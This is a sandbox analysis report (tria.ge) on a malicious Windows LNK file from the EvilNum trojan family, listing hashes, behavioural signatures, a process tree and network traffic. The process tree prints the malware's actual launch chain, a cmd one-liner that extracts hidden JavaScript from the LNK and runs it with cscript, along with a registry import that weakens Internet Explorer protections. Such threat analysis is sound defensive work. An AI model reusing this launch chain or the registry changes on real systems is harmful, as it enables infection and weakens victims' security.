Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

0713c5c3db...fc.lnk

windows7_x64

10

0713c5c3db...fc.lnk

windows10-2004_x64

10

Analysis

  • max time kernel
    153s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    04/02/2022, 08:41 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk

  • Size

    33KB

  • MD5

    219dedb53da6b1dce0d6c071af59b45c

  • SHA1

    650deb9baff4b7564146222deb555e77d5cbbe36

  • SHA256

    0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc

  • SHA512

    dfb89f58f70aa56b7dc681d01626f59c76c2d1bfa777f49b0ec0885c8122fe48e8fd88a92bc5879643b10a17ee709946871004f88187b6e56cca39be915c2e0a

Score
10/10
evilnumpersistencetrojan

Malware Config

Signatures

  • EvilNum C# Component 2 IoCs
  • EvilNum JS Component 2 IoCs
  • Evilnum

    A malware family with multiple components distributed through LNK files.

    trojanevilnum
  • Sets service image path in registry 2 TTPs
    persistence
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer Automatic Crash Recovery 1 TTPs 1 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer Protected Mode 1 TTPs 1 IoCs
  • Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 47 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1900
    • C:\WINDOWS\system32\cmd.exe
      "C:\WINDOWS\system32\cmd.exe" /c copy 2*.lnk C:\Users\Admin\AppData\Local\Temp&C:&cd C:\Users\Admin\AppData\Local\Temp&attrib +r *.lnk&for /f "delims=" %a in ('dir /s /b *.LnK') do type "%~fa" | find "p0b2x6">.js &CsCRipt .js "%~fa"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3892
      • C:\Windows\system32\attrib.exe
        attrib +r *.lnk
        3⤵
        • Views/modifies file attributes
        PID:3780
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c dir /s /b *.LnK
        3⤵
          PID:644
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk" "
          3⤵
            PID:480
          • C:\Windows\system32\find.exe
            find "p0b2x6"
            3⤵
              PID:396
            • C:\Windows\system32\cscript.exe
              CsCRipt .js "C:\Users\Admin\AppData\Local\Temp\0713c5c3db572d88b08d527533cb07d25d33c1c7535cf59075e693b4fefba1fc.lnk"
              3⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:2528
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c 200_Germany.csv
                4⤵
                • Checks computer location settings
                • Modifies registry class
                • Suspicious use of WriteProcessMemory
                PID:1136
                • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
                  "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\200_Germany.csv"
                  5⤵
                    PID:3560
                • C:\Windows\System32\cscript.exe
                  "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\file.js
                  4⤵
                  • Checks computer location settings
                  • Suspicious use of WriteProcessMemory
                  PID:1868
                  • C:\Windows\System32\cscript.exe
                    "C:\Windows\System32\cscript.exe" C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\kill.js
                    5⤵
                      PID:1620
                    • C:\Windows\System32\reg.exe
                      "C:\Windows\System32\reg.exe" import C:\Users\Admin\AppData\Local\Microsoft\PackageCache\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\g3r.reg
                      5⤵
                      • Modifies Internet Explorer Automatic Crash Recovery
                      • Modifies Internet Explorer Phishing Filter
                      • Modifies Internet Explorer Protected Mode
                      • Modifies Internet Explorer Protected Mode Banner
                      • Modifies Internet Explorer settings
                      PID:540
            • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
              "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
              1⤵
                PID:3764
              • C:\Program Files\Internet Explorer\iexplore.exe
                "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                1⤵
                • Modifies Internet Explorer settings
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:220
                • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:220 CREDAT:17410 /prefetch:2
                  2⤵
                  • Modifies Internet Explorer settings
                  • Suspicious use of SetWindowsHookEx
                  PID:3760
              • C:\Windows\system32\MusNotifyIcon.exe
                %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
                1⤵
                • Checks processor information in registry
                PID:3872
              • C:\Windows\System32\WaaSMedicAgent.exe
                C:\Windows\System32\WaaSMedicAgent.exe 798d2b5301d19e9cab21e678228390d6 CH6w7teuu0eD8V7P0UJRQw.0.1.0.0.0
                1⤵
                • Modifies data under HKEY_USERS
                PID:3492
              • C:\Windows\system32\MusNotifyIcon.exe
                %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
                1⤵
                • Checks processor information in registry
                PID:3248
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k NetworkService -p
                1⤵
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                PID:116

              Network

              • flag-us
                DNS
                settings-win.data.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                settings-win.data.microsoft.com
                IN A
                Response
                settings-win.data.microsoft.com
                IN CNAME
                settingsfd-geo.trafficmanager.net
                settingsfd-geo.trafficmanager.net
                IN A
                51.124.78.146
              • flag-us
                DNS
                settings-win.data.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                settings-win.data.microsoft.com
                IN A
                Response
                settings-win.data.microsoft.com
                IN CNAME
                settingsfd-geo.trafficmanager.net
                settingsfd-geo.trafficmanager.net
                IN A
                52.167.249.196
              • flag-us
                DNS
                raw.githubusercontent.com
                IEXPLORE.EXE
                Remote address:
                8.8.8.8:53
                Request
                raw.githubusercontent.com
                IN A
                Response
                raw.githubusercontent.com
                IN A
                185.199.108.133
                raw.githubusercontent.com
                IN A
                185.199.109.133
                raw.githubusercontent.com
                IN A
                185.199.110.133
                raw.githubusercontent.com
                IN A
                185.199.111.133
              • flag-us
                DNS
                geo.prod.do.dsp.mp.microsoft.com
                NetworkService
                Remote address:
                8.8.8.8:53
                Request
                geo.prod.do.dsp.mp.microsoft.com
                IN A
                Response
                geo.prod.do.dsp.mp.microsoft.com
                IN CNAME
                geo.prod.do.dsp.trafficmanager.net
                geo.prod.do.dsp.trafficmanager.net
                IN CNAME
                array809.prod.do.dsp.mp.microsoft.com
                array809.prod.do.dsp.mp.microsoft.com
                IN A
                40.91.73.169
              • flag-us
                DNS
                kv801.prod.do.dsp.mp.microsoft.com
                NetworkService
                Remote address:
                8.8.8.8:53
                Request
                kv801.prod.do.dsp.mp.microsoft.com
                IN A
                Response
                kv801.prod.do.dsp.mp.microsoft.com
                IN CNAME
                kv801.prod.do.dsp.mp.microsoft.com.edgekey.net
                kv801.prod.do.dsp.mp.microsoft.com.edgekey.net
                IN CNAME
                e12437.g.akamaiedge.net
                e12437.g.akamaiedge.net
                IN A
                184.29.205.60
              • flag-nl
                GET
                https://kv801.prod.do.dsp.mp.microsoft.com/all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1
                NetworkService
                Remote address:
                184.29.205.60:443
                Request
                GET /all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1 HTTP/1.1
                Connection: Keep-Alive
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Microsoft-Delivery-Optimization/10.0
                MS-CV: G4Aui0DO5UCt8Qvk.2.1.1
                Content-Length: 0
                Host: kv801.prod.do.dsp.mp.microsoft.com
                Response
                HTTP/1.1 200 OK
                Content-Type: text/json
                Server: Microsoft-IIS/10.0
                X-AspNet-Version: 4.0.30319
                X-Powered-By: ASP.NET
                Vary: Accept-Encoding
                Content-Encoding: gzip
                Content-Length: 808
                Cache-Control: max-age=687
                Date: Fri, 04 Feb 2022 08:57:14 GMT
                Connection: keep-alive
              • flag-us
                DNS
                settings-win.data.microsoft.com
                Remote address:
                8.8.8.8:53
                Request
                settings-win.data.microsoft.com
                IN A
                Response
                settings-win.data.microsoft.com
                IN CNAME
                settingsfd-geo.trafficmanager.net
                settingsfd-geo.trafficmanager.net
                IN A
                52.167.17.97
              • flag-us
                GET
                https://raw.githubusercontent.com/deadpooool/news/master/README.md
                IEXPLORE.EXE
                Remote address:
                185.199.108.133:443
                Request
                GET /deadpooool/news/master/README.md HTTP/2.0
                host: raw.githubusercontent.com
                accept: text/html, application/xhtml+xml, image/jxr, */*
                accept-language: en-US
                user-agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                accept-encoding: gzip, deflate
                Response
                HTTP/2.0 404
                content-security-policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                strict-transport-security: max-age=31536000
                x-content-type-options: nosniff
                x-frame-options: deny
                x-xss-protection: 1; mode=block
                content-type: text/plain; charset=utf-8
                x-github-request-id: A8E2:BA8B:AB422B:B6FB9D:61FCEA4D
                accept-ranges: bytes
                date: Fri, 04 Feb 2022 08:57:23 GMT
                via: 1.1 varnish
                x-served-by: cache-ams21041-AMS
                x-cache: HIT
                x-cache-hits: 1
                x-timer: S1643965044.663079,VS0,VE0
                vary: Authorization,Accept-Encoding,Origin
                access-control-allow-origin: *
                x-fastly-request-id: d70258487a9cdd44ee916d953c190e9e9f4ce2ca
                expires: Fri, 04 Feb 2022 09:02:23 GMT
                source-age: 38
                content-length: 14
              • 92.123.77.73:80
                322 B
                 7
              • 104.110.191.140:80
                322 B
                 7
              • 51.124.78.146:443
                settings-win.data.microsoft.com
                tls, https
                2.1kB
                 4.6kB
                 13
                12
              • 51.124.78.146:443
                settings-win.data.microsoft.com
                tls, https
                1.6kB
                 4.4kB
                 12
                10
              • 51.124.78.146:443
                settings-win.data.microsoft.com
                tls, https
                1.8kB
                 4.4kB
                 12
                10
              • 93.184.221.240:80
                322 B
                 7
              • 72.21.91.29:80
                322 B
                 7
              • 52.167.249.196:443
                settings-win.data.microsoft.com
                tls, https
                2.6kB
                 8.0kB
                 15
                15
              • 40.91.73.169:443
                geo.prod.do.dsp.mp.microsoft.com
                tls, https
                NetworkService
                1.2kB
                 3.5kB
                 12
                9
              • 184.29.205.60:443
                https://kv801.prod.do.dsp.mp.microsoft.com/all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1
                tls, http
                NetworkService
                1.0kB
                 7.7kB
                 8
                11

                HTTP Request

                GET https://kv801.prod.do.dsp.mp.microsoft.com/all?doClientVersion=10.0.19041.1266&countryCode=US&profile=256&CacheId=1

                HTTP Response

                200
              • 52.167.17.97:443
                settings-win.data.microsoft.com
                tls, https
                1.3kB
                 4.4kB
                 12
                10
              • 185.199.108.133:443
                https://raw.githubusercontent.com/deadpooool/news/master/README.md
                tls, http2
                IEXPLORE.EXE
                1.2kB
                 5.3kB
                 13
                12

                HTTP Request

                GET https://raw.githubusercontent.com/deadpooool/news/master/README.md

                HTTP Response

                404
              • 185.199.108.133:443
                raw.githubusercontent.com
                tls, http2
                IEXPLORE.EXE
                916 B
                 4.7kB
                 11
                10
              • 8.8.8.8:53
                settings-win.data.microsoft.com
                dns
                77 B
                 140 B
                 1
                1

                DNS Request

                settings-win.data.microsoft.com

                DNS Response

                51.124.78.146

              • 8.8.8.8:53
                settings-win.data.microsoft.com
                dns
                77 B
                 140 B
                 1
                1

                DNS Request

                settings-win.data.microsoft.com

                DNS Response

                52.167.249.196

              • 8.8.8.8:53
                raw.githubusercontent.com
                dns
                IEXPLORE.EXE
                71 B
                 135 B
                 1
                1

                DNS Request

                raw.githubusercontent.com

                DNS Response

                185.199.108.133
                185.199.109.133
                185.199.110.133
                185.199.111.133

              • 8.8.8.8:53
                geo.prod.do.dsp.mp.microsoft.com
                dns
                NetworkService
                78 B
                 165 B
                 1
                1

                DNS Request

                geo.prod.do.dsp.mp.microsoft.com

                DNS Response

                40.91.73.169

              • 8.8.8.8:53
                kv801.prod.do.dsp.mp.microsoft.com
                dns
                NetworkService
                80 B
                 190 B
                 1
                1

                DNS Request

                kv801.prod.do.dsp.mp.microsoft.com

                DNS Response

                184.29.205.60

              • 8.8.8.8:53
                settings-win.data.microsoft.com
                dns
                77 B
                 140 B
                 1
                1

                DNS Request

                settings-win.data.microsoft.com

                DNS Response

                52.167.17.97

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/3560-458-0x00007FF99B410000-0x00007FF99B420000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3560-459-0x00007FF99B410000-0x00007FF99B420000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3560-460-0x00007FF99B410000-0x00007FF99B420000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3560-461-0x00007FF99B410000-0x00007FF99B420000-memory.dmp

                Filesize

                64KB

                Download

              • memory/3560-462-0x00007FF99B410000-0x00007FF99B420000-memory.dmp

                Filesize

                64KB

                Download

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.